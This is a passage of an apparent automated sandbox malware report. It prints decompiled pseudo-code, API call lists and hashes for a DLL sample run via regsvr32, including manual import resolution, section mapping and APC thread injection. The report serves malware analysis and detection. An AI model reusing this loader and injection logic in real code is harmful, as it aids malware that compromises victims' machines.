                                                                                                                                                                  							}
                                                                                                                                                                  							_v24 = _v24 & 0x00000000;
                                                                                                                                                                  							 *_t71 = _t59 - 0x63699bc3;
                                                                                                                                                                  							_t49 = _v12;
                                                                                                                                                                  							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                                                                  							_t50 =  *_t49;
                                                                                                                                                                  							if(_t50 != 0) {
                                                                                                                                                                  								L6:
                                                                                                                                                                  								_t73 = _t50 + _t69;
                                                                                                                                                                  								_v16 = _t61 + _t69;
                                                                                                                                                                  								while(1) {
                                                                                                                                                                  									_t51 =  *_t73;
                                                                                                                                                                  									if(_t51 == 0) {
                                                                                                                                                                  										break;
                                                                                                                                                                  									}
                                                                                                                                                                  									if(__eflags < 0) {
                                                                                                                                                                  										__eflags = _t51 - _t69;
                                                                                                                                                                  										if(_t51 < _t69) {
                                                                                                                                                                  											L12:
                                                                                                                                                                  											_t21 =  &_v8;
                                                                                                                                                                  											 *_t21 = _v8 & 0x00000000;
                                                                                                                                                                  											__eflags =  *_t21;
                                                                                                                                                                  											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t65 = _a4;
                                                                                                                                                                  											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                                                                  											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                                                                  												goto L12;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												goto L11;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t51 = _t51 + _t69;
                                                                                                                                                                  										L11:
                                                                                                                                                                  										_v8 = _t51;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t53 = _v8;
                                                                                                                                                                  									__eflags = _t53;
                                                                                                                                                                  									if(_t53 == 0) {
                                                                                                                                                                  										_t54 = _v24 & 0x0000ffff;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t54 = _t53 + 2;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                                                                  									__eflags = _t55;
                                                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                                                  										_v20 = _t59 - 0x63699b44;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t68 = _v8;
                                                                                                                                                                  										__eflags = _t68;
                                                                                                                                                                  										if(_t68 != 0) {
                                                                                                                                                                  											 *_t68 = _t59 - 0x63699bc3;
                                                                                                                                                                  										}
                                                                                                                                                                  										 *_v16 = _t55;
                                                                                                                                                                  										_t58 = 0x725990f8 + _t59 * 4;
                                                                                                                                                                  										_t73 = _t73 + _t58;
                                                                                                                                                                  										_t32 =  &_v16;
                                                                                                                                                                  										 *_t32 = _v16 + _t58;
                                                                                                                                                                  										__eflags =  *_t32;
                                                                                                                                                                  										continue;
                                                                                                                                                                  									}
                                                                                                                                                                  									goto L23;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t50 = _t61;
                                                                                                                                                                  								if(_t61 != 0) {
                                                                                                                                                                  									goto L6;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  							L23:
                                                                                                                                                                  							_v12 = _v12 + 0x14;
                                                                                                                                                                  							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                                  							if(_t46 != 0) {
                                                                                                                                                                  								continue;
                                                                                                                                                                  							} else {
                                                                                                                                                                  							}
                                                                                                                                                                  							L26:
                                                                                                                                                                  							goto L27;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t60 = _t59 + 0x9c9664bb;
                                                                                                                                                                  						__eflags = _t60;
                                                                                                                                                                  						_v20 = _t60;
                                                                                                                                                                  						goto L26;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				L27:
                                                                                                                                                                  				return _v20;
                                                                                                                                                                  			}





























                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 67CD1FB4
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 67CD2026
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                  • Opcode ID: 3bd80669eebaa1b0b4a1bd10f426e2d406d08d9fa16b9f44f070db5731c6ef63
                                                                                                                                                                  • Instruction ID: 2b0b2b23e26e8a3a05248e5bce104d8dc3cdef9999820b3e82f48212cf6fd264
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bd80669eebaa1b0b4a1bd10f426e2d406d08d9fa16b9f44f070db5731c6ef63
                                                                                                                                                                  • Instruction Fuzzy Hash: 47311571A0020ADFDB14CFA9C894AAEBBF8FF59341F14406ADA55E7244F774EA41CB50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E67CD1EC7(void** __esi, PVOID* _a4) {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				void* _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				long _t13;
                                                                                                                                                                  
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                                                  				if(_t13 < 0) {
                                                                                                                                                                  					_push(_t13);
                                                                                                                                                                  					return __esi[6]();
                                                                                                                                                                  				}
                                                                                                                                                                  				return 0;
                                                                                                                                                                  			}








                                                                                                                                                                  APIs
                                                                                                                                                                  • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,67CD1C0E,00000002,00000000,?,?,00000000,?,?,67CD1C0E,00000000), ref: 67CD1EF4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: SectionView
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1323581903-0
                                                                                                                                                                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                  • Instruction ID: 74090a63db74b8b452dba94e31ee7e82ce2f0212ef3ec7df92ae12ec9a44df13
                                                                                                                                                                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                  • Instruction Fuzzy Hash: 4DF012B690420CBFEB119FA9CC85C9FBBBDEB48354B104939B652E1090D6309E088A60
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                  			E67CD1C7D(intOrPtr _a4) {
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				struct _SYSTEMTIME _v44;
                                                                                                                                                                  				char _v48;
                                                                                                                                                                  				long _v52;
                                                                                                                                                                  				long _v56;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				long _t21;
                                                                                                                                                                  				int _t23;
                                                                                                                                                                  				long _t26;
                                                                                                                                                                  				long _t27;
                                                                                                                                                                  				long _t31;
                                                                                                                                                                  				void* _t37;
                                                                                                                                                                  				intOrPtr _t39;
                                                                                                                                                                  				intOrPtr _t44;
                                                                                                                                                                  				signed int _t45;
                                                                                                                                                                  				void* _t50;
                                                                                                                                                                  				signed int _t54;
                                                                                                                                                                  				void* _t56;
                                                                                                                                                                  				intOrPtr* _t57;
                                                                                                                                                                  
                                                                                                                                                                  				_t21 = E67CD1F10();
                                                                                                                                                                  				_v52 = _t21;
                                                                                                                                                                  				if(_t21 != 0) {
                                                                                                                                                                  					L18:
                                                                                                                                                                  					return _t21;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					goto L1;
                                                                                                                                                                  				}
                                                                                                                                                                  				do {
                                                                                                                                                                  					L1:
                                                                                                                                                                  					GetSystemTime( &_v44);
                                                                                                                                                                  					_t23 = SwitchToThread();
                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                  					_t45 = 9;
                                                                                                                                                                  					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                                                                                                                                                                  					_t26 = E67CD18AD(0, _t54); // executed
                                                                                                                                                                  					_v56 = _t26;
                                                                                                                                                                  					Sleep(_t54 << 5); // executed
                                                                                                                                                                  					_t21 = _v56;
                                                                                                                                                                  				} while (_t21 == 0xc);
                                                                                                                                                                  				if(_t21 != 0) {
                                                                                                                                                                  					goto L18;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t27 = E67CD1ADB(_t45); // executed
                                                                                                                                                                  				_v52 = _t27;
                                                                                                                                                                  				if(_t27 != 0) {
                                                                                                                                                                  					L16:
                                                                                                                                                                  					_t21 = _v52;
                                                                                                                                                                  					if(_t21 == 0xffffffff) {
                                                                                                                                                                  						_t21 = GetLastError();
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L18;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                                  					L11:
                                                                                                                                                                  					_push(0);
                                                                                                                                                                  					_t56 = E67CD13D1(E67CD14E8,  &_v28);
                                                                                                                                                                  					if(_t56 == 0) {
                                                                                                                                                                  						_v56 = GetLastError();
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t31 = WaitForSingleObject(_t56, 0xffffffff);
                                                                                                                                                                  						_v56 = _t31;
                                                                                                                                                                  						if(_t31 == 0) {
                                                                                                                                                                  							GetExitCodeThread(_t56,  &_v56);
                                                                                                                                                                  						}
                                                                                                                                                                  						CloseHandle(_t56);
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L16;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(E67CD134F(_t45,  &_v48) != 0) {
                                                                                                                                                                  					 *0x67cd41b8 = 0;
                                                                                                                                                                  					goto L11;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t44 = _v48;
                                                                                                                                                                  				_t57 = __imp__GetLongPathNameW;
                                                                                                                                                                  				_t37 =  *_t57(_t44, 0, 0); // executed
                                                                                                                                                                  				_t50 = _t37;
                                                                                                                                                                  				if(_t50 == 0) {
                                                                                                                                                                  					L9:
                                                                                                                                                                  					 *0x67cd41b8 = _t44;
                                                                                                                                                                  					goto L11;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t15 = _t50 + 2; // 0x2
                                                                                                                                                                  				_t39 = E67CD1B58(_t50 + _t15);
                                                                                                                                                                  				 *0x67cd41b8 = _t39;
                                                                                                                                                                  				if(_t39 == 0) {
                                                                                                                                                                  					goto L9;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					 *_t57(_t44, _t39, _t50); // executed
                                                                                                                                                                  					E67CD142F(_t44);
                                                                                                                                                                  					goto L11;
                                                                                                                                                                  				}
                                                                                                                                                                  			}























                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 67CD1F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,67CD1C8E,74B063F0,00000000), ref: 67CD1F1F
                                                                                                                                                                    • Part of subcall function 67CD1F10: GetVersion.KERNEL32 ref: 67CD1F2E
                                                                                                                                                                    • Part of subcall function 67CD1F10: GetCurrentProcessId.KERNEL32 ref: 67CD1F3D
                                                                                                                                                                    • Part of subcall function 67CD1F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 67CD1F56
                                                                                                                                                                  • GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 67CD1CA1
                                                                                                                                                                  • SwitchToThread.KERNEL32 ref: 67CD1CA7
                                                                                                                                                                    • Part of subcall function 67CD18AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 67CD1903
                                                                                                                                                                    • Part of subcall function 67CD18AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 67CD19C9
                                                                                                                                                                  • Sleep.KERNELBASE(00000000,00000000), ref: 67CD1CCA
                                                                                                                                                                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 67CD1D12
                                                                                                                                                                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 67CD1D30
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,67CD14E8,?,00000000), ref: 67CD1D62
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(00000000,?), ref: 67CD1D76
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 67CD1D7D
                                                                                                                                                                  • GetLastError.KERNEL32(67CD14E8,?,00000000), ref: 67CD1D85
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 67CD1D98
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1962885430-0
                                                                                                                                                                  • Opcode ID: 67376253c0c9c92365f832db18a6a49425bf2a8baeb2ca2a70dc03c9130926db
                                                                                                                                                                  • Instruction ID: 1b143a0a601ef635c323f5fdc49bc50b841d0d115258fc1778b813ce63fe93e0
                                                                                                                                                                  • Opcode Fuzzy Hash: 67376253c0c9c92365f832db18a6a49425bf2a8baeb2ca2a70dc03c9130926db
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E316F71544741AB8711DF7E888996F76FCAF8E354F120A1AFB65C2140FB34D500C7A6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 107 67cd1060-67cd1072 call 67cd1b58 110 67cd1078-67cd10ad GetModuleHandleA GetProcAddress 107->110 111 67cd1133 107->111 113 67cd10af-67cd10c3 GetProcAddress 110->113 114 67cd112b-67cd1131 call 67cd142f 110->114 112 67cd113a-67cd1141 111->112 113->114 115 67cd10c5-67cd10d9 GetProcAddress 113->115 114->112 115->114 118 67cd10db-67cd10ef GetProcAddress 115->118 118->114 119 67cd10f1-67cd1105 GetProcAddress 118->119 119->114 120 67cd1107-67cd1118 call 67cd1b9c 119->120 122 67cd111d-67cd1122 120->122 122->114 123 67cd1124-67cd1129 122->123 123->112
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E67CD1060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				_Unknown_base(*)()* _t29;
                                                                                                                                                                  				_Unknown_base(*)()* _t33;
                                                                                                                                                                  				_Unknown_base(*)()* _t36;
                                                                                                                                                                  				_Unknown_base(*)()* _t39;
                                                                                                                                                                  				_Unknown_base(*)()* _t42;
                                                                                                                                                                  				intOrPtr _t46;
                                                                                                                                                                  				struct HINSTANCE__* _t50;
                                                                                                                                                                  				intOrPtr _t56;
                                                                                                                                                                  
                                                                                                                                                                  				_t56 = E67CD1B58(0x20);
                                                                                                                                                                  				if(_t56 == 0) {
                                                                                                                                                                  					_v8 = 8;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t50 = GetModuleHandleA( *0x67cd41d0 + 0x67cd5014);
                                                                                                                                                                  					_v8 = 0x7f;
                                                                                                                                                                  					_t29 = GetProcAddress(_t50,  *0x67cd41d0 + 0x67cd50e1);
                                                                                                                                                                  					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                  					if(_t29 == 0) {
                                                                                                                                                                  						L8:
                                                                                                                                                                  						E67CD142F(_t56);
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t33 = GetProcAddress(_t50,  *0x67cd41d0 + 0x67cd50f1);
                                                                                                                                                                  						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                  						if(_t33 == 0) {
                                                                                                                                                                  							goto L8;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t36 = GetProcAddress(_t50,  *0x67cd41d0 + 0x67cd5104);
                                                                                                                                                                  							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                  							if(_t36 == 0) {
                                                                                                                                                                  								goto L8;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t39 = GetProcAddress(_t50,  *0x67cd41d0 + 0x67cd5119);
                                                                                                                                                                  								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                  								if(_t39 == 0) {
                                                                                                                                                                  									goto L8;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t42 = GetProcAddress(_t50,  *0x67cd41d0 + 0x67cd512f);
                                                                                                                                                                  									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                  									if(_t42 == 0) {
                                                                                                                                                                  										goto L8;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                  										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                  										_t46 = E67CD1B9C(_t56, _a12); // executed
                                                                                                                                                                  										_v8 = _t46;
                                                                                                                                                                  										if(_t46 != 0) {
                                                                                                                                                                  											goto L8;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											 *_a16 = _t56;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v8;
                                                                                                                                                                  			}













                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 67CD1B58: HeapAlloc.KERNEL32(00000000,?,67CD1702,?,00000000,00000000,?,?,?,67CD1CE6), ref: 67CD1B64
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,67CD1480,?,?,?,?,00000002,00000000,?,?), ref: 67CD1084
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 67CD10A6
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 67CD10BC
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 67CD10D2
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 67CD10E8
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 67CD10FE
                                                                                                                                                                    • Part of subcall function 67CD1B9C: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 67CD1BF9
                                                                                                                                                                    • Part of subcall function 67CD1B9C: memset.NTDLL ref: 67CD1C1B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1632424568-0
                                                                                                                                                                  • Opcode ID: 87891b127afffb9a195ae895041c93d9dcc18623e942644cd28d390c86b2889d
                                                                                                                                                                  • Instruction ID: 918d63128f4a9c984aa4f17666073b26ab1cf8291fed12a9a8575b442f4ff28a
                                                                                                                                                                  • Opcode Fuzzy Hash: 87891b127afffb9a195ae895041c93d9dcc18623e942644cd28d390c86b2889d
                                                                                                                                                                  • Instruction Fuzzy Hash: 63212BB160060AEFDB10EF6DE8C5E5A7BFCEB19344B024425EA05C7201F734EA45CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 124 67cd1dae-67cd1dc2 125 67cd1dc4-67cd1dc5 124->125 126 67cd1e33-67cd1e40 InterlockedDecrement 124->126 127 67cd1e80-67cd1e87 125->127 129 67cd1dcb-67cd1dd8 InterlockedIncrement 125->129 126->127 128 67cd1e42-67cd1e48 126->128 130 67cd1e4a 128->130 131 67cd1e74-67cd1e7a HeapDestroy 128->131 129->127 132 67cd1dde-67cd1df2 HeapCreate 129->132 133 67cd1e4f-67cd1e5f SleepEx 130->133 131->127 134 67cd1e2e-67cd1e31 132->134 135 67cd1df4-67cd1e25 call 67cd121c call 67cd13d1 132->135 136 67cd1e68-67cd1e6e CloseHandle 133->136 137 67cd1e61-67cd1e66 133->137 134->127 135->127 142 67cd1e27-67cd1e2a 135->142 136->131 137->133 137->136 142->134
                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                  			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				char _t9;
                                                                                                                                                                  				void* _t10;
                                                                                                                                                                  				void* _t18;
                                                                                                                                                                  				void* _t23;
                                                                                                                                                                  				void* _t36;
                                                                                                                                                                  
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_t9 = _a8;
                                                                                                                                                                  				_v8 = 1;
                                                                                                                                                                  				if(_t9 == 0) {
                                                                                                                                                                  					_t10 = InterlockedDecrement(0x67cd4188);
                                                                                                                                                                  					__eflags = _t10;
                                                                                                                                                                  					if(_t10 == 0) {
                                                                                                                                                                  						__eflags =  *0x67cd418c;
                                                                                                                                                                  						if( *0x67cd418c != 0) {
                                                                                                                                                                  							_t36 = 0x2328;
                                                                                                                                                                  							while(1) {
                                                                                                                                                                  								SleepEx(0x64, 1);
                                                                                                                                                                  								__eflags =  *0x67cd4198;
                                                                                                                                                                  								if( *0x67cd4198 == 0) {
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t36 = _t36 - 0x64;
                                                                                                                                                                  								__eflags = _t36;
                                                                                                                                                                  								if(_t36 > 0) {
                                                                                                                                                                  									continue;
                                                                                                                                                                  								}
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							CloseHandle( *0x67cd418c);
                                                                                                                                                                  						}
                                                                                                                                                                  						HeapDestroy( *0x67cd4190);
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					if(_t9 == 1 && InterlockedIncrement(0x67cd4188) == 1) {
                                                                                                                                                                  						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                  						_t41 = _t18;
                                                                                                                                                                  						 *0x67cd4190 = _t18;
                                                                                                                                                                  						if(_t18 == 0) {
                                                                                                                                                                  							L6:
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							 *0x67cd41b0 = _a4;
                                                                                                                                                                  							asm("lock xadd [eax], edi");
                                                                                                                                                                  							_push( &_a8);
                                                                                                                                                                  							_t23 = E67CD13D1(E67CD20CE, E67CD121C(_a12, 1, 0x67cd4198, _t41));
                                                                                                                                                                  							 *0x67cd418c = _t23;
                                                                                                                                                                  							if(_t23 == 0) {
                                                                                                                                                                  								asm("lock xadd [esi], eax");
                                                                                                                                                                  								goto L6;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v8;
                                                                                                                                                                  			}












                                                                                                                                                                  0x67cd1e2e
                                                                                                                                                                  0x67cd1df4
                                                                                                                                                                  0x67cd1dfc
                                                                                                                                                                  0x67cd1e03
                                                                                                                                                                  0x67cd1e0d
                                                                                                                                                                  0x67cd1e19
                                                                                                                                                                  0x67cd1e20
                                                                                                                                                                  0x67cd1e25
                                                                                                                                                                  0x67cd1e2a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1e2a
                                                                                                                                                                  0x67cd1e25
                                                                                                                                                                  0x67cd1df2
                                                                                                                                                                  0x67cd1dc5
                                                                                                                                                                  0x67cd1e87

                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(67CD4188), ref: 67CD1DD0
                                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 67CD1DE5
                                                                                                                                                                    • Part of subcall function 67CD13D1: CreateThread.KERNELBASE ref: 67CD13E8
                                                                                                                                                                    • Part of subcall function 67CD13D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 67CD13FD
                                                                                                                                                                    • Part of subcall function 67CD13D1: GetLastError.KERNEL32(00000000), ref: 67CD1408
                                                                                                                                                                    • Part of subcall function 67CD13D1: TerminateThread.KERNEL32(00000000,00000000), ref: 67CD1412
                                                                                                                                                                    • Part of subcall function 67CD13D1: CloseHandle.KERNEL32(00000000), ref: 67CD1419
                                                                                                                                                                    • Part of subcall function 67CD13D1: SetLastError.KERNEL32(00000000), ref: 67CD1422
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(67CD4188), ref: 67CD1E38
                                                                                                                                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 67CD1E52
                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 67CD1E6E
                                                                                                                                                                  • HeapDestroy.KERNEL32 ref: 67CD1E7A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2110400756-0
                                                                                                                                                                  • Opcode ID: 54c056cb51e3429d6fcb0a97a4c28e9bd6cef6f1be6e50581efa53fe636daf6e
                                                                                                                                                                  • Instruction ID: 29c9d5cbf6702928ebc4afe665454702b77f6fb44de0fbdd3af45ff041878af2
                                                                                                                                                                  • Opcode Fuzzy Hash: 54c056cb51e3429d6fcb0a97a4c28e9bd6cef6f1be6e50581efa53fe636daf6e
                                                                                                                                                                  • Instruction Fuzzy Hash: 58217275600205FBDB009FADCCC9A4ABBB9FB5E764B224129FB55D3540F7389A00CB68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E67CD13D1(long _a4, DWORD* _a12) {
